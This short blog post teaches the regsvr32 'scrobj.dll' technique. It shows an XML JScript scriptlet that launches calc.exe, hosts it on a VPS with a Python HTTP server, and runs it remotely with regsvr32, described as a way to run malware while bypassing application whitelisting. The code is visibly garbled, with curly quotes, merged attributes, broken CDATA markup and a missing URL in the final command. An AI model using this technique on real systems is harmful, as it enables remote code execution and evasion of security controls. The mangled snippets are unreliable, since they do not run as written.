Running Remote Scripts Using regsvr32

1 min readOct 14, 2021

Hi ! , Today we will talk about running remote scripts using regsvr32,

First of all , What is regsvr32?

Regsvr32 is a command-line utility in Microsoft Windows and ReactOS for registering and unregistering DLLs.

Usage Example :

regsvr32 file.dll # registering filesregsvr32 /u file.dll # unregistering file

Using /i parameter in regsvr32, We can execute JScript or VBScript code embedded in XML ,which is used to trigger any initial installation processing.

Executing JScript or VBScript code , Means that we can execute commands to gain access using it , and our malware will run under regsvr32 process with bypassing application whitelisting.

Let’s Start!

We will use calc.exe as the program that will be executed , and using process hacker for viewing the process.

let’s save our payload into .csc file extension

<?XML version=”1.0"?><scriptlet><registrationprogid=”Pentest”classid=”{10001111–0000–0000–0000–0000FEEDACDC}” ><script language=”JScript”>![CDATA[var r = new ActiveXObject(“WScript.Shell”).Run(“calc.exe”);]]></script></registration></scriptlet>

and save it into our VPS.

Then , we can run python3 simple http server using

python3 -m http.server 80

ِAfter running the server , we will use this command to run our payload

regsvr32.exe /s /i: scrobj.dll

and We Are Done!




R00T , 14 Years Old , From jordan , Interested in Red Teaming & Malware Developing.